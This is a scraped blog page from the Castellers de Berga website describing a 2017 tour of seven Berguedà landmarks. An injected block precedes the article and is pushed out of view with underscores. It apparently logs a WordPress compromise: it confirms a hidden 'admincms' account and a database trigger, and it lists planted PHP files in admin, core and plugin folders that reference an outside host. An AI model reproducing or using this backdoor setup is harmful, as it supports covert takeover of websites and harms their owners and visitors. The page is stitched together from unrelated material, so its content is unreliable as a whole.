Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?wp https://castellersdeberga.cat/wp-admin/theme-editor-ajax-response-ajax-response-ajax.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/network/user-edit-stream-private-cron-cron-ajax-response-cron.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/install-meta-ajax-core-cron-core.php https://castellersdeberga.cat/wp-content/plugins/woo-redsys-gateway-light/about-redsys-private-stream-core-core-meta-private.php https://castellersdeberga.cat/wp-content/plugins/woocommerce/uninstall-stream-ajax-response-cron-core-wp-private-ajax.php https://castellersdeberga.cat/wp-includes/capabilities-wp-cron.php https://castellersdeberga.cat/wp-includes/media-cron-core-wp.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Les 7 meravelles del Berguedà
 

Les 7 meravelles del Berguedà


Les 7 meravelles del BerguedàDissabte 9 de setembre de 2017 era el dia. Era el dia que teníem marcat al calendari per recórrer el Berguedà de punta a punta, passant pels llocs més bonics i emblemàtics. També va ser el dia que va aparèixer la tardor així de sobre, a finals de l’estiu més assolellat i sec dels últims anys. Feia mesos que no vivíem un dia continuadament gris i plujós. Així i tot, no ens va mancar l’alegria i ens n’alegrem també per la pluja caiguda que alimentarà boscos i camps, molt necessitats.
Vam estar 10 hores fent quilòmetres de nord a sud per apropar-nos a les 7 meravelles del Berguedà, escollides per una enquesta juntament amb l’Aquí Berguedà, i fer-hi un pilar.
Vam comptar amb la col.laboració de Transcerdanya, de PD Nanfu i Salasxic i de Dronecam.cat que va enregistrar imatges aèries (ben aviat, el resultat)

Fonts del Llobregat
A Castellar de n’Hug, a 1295 metres, trobem el punt d’inici del riu Llobregat. Aquí brolla l’aigua que, 175km més al sud, desemboca al Mar Mediterrani.

foto: Josep Pont i Roca
Jardins Artigas
Situats a La Pobla de Lillet, els Jardins Artigas van ser dissenyats per Antoni Gaudí i van construïr-se entre 1905 i 1906.

foto: Josep Pont i Roca

Santuari de Queralt
És l’anomenat balcó del Berguedà, des d’on s’observa la meitat sud de la comarca. I està situat a 1200 metres d’alçada, lloc molt freqüent de peregrinatge.

foto: Josep Pont i Roca

Pi de les Tres Branques
L’arbre sagrat de la Pàtria, inspirador de Verdaguer i ombra dels somnis de Jaume I. Símbol dels Països Catalans.

foto: Josep Pont i Roca

Pedraforca
Format fa uns 25 milions d’anys, aquesta muntanya de 2506 metres d’altitud és una de les més conegudes del país.

foto: Josep Pont i Roca

Alzina dels Colls
Arbre monumental i molt estimat al Baix Berguedà. 22 metres d’alçada i un ample de capçada de gairebé 33 metres. Al terme municipal de Casserres.

foto: Lurdes Pons

Pont de Pedret
Pont medieval, per sobre del riu Llobregat, que porta a l’església romànica de Sant Quirze de Pedret.

foto: Josep Pont i Roca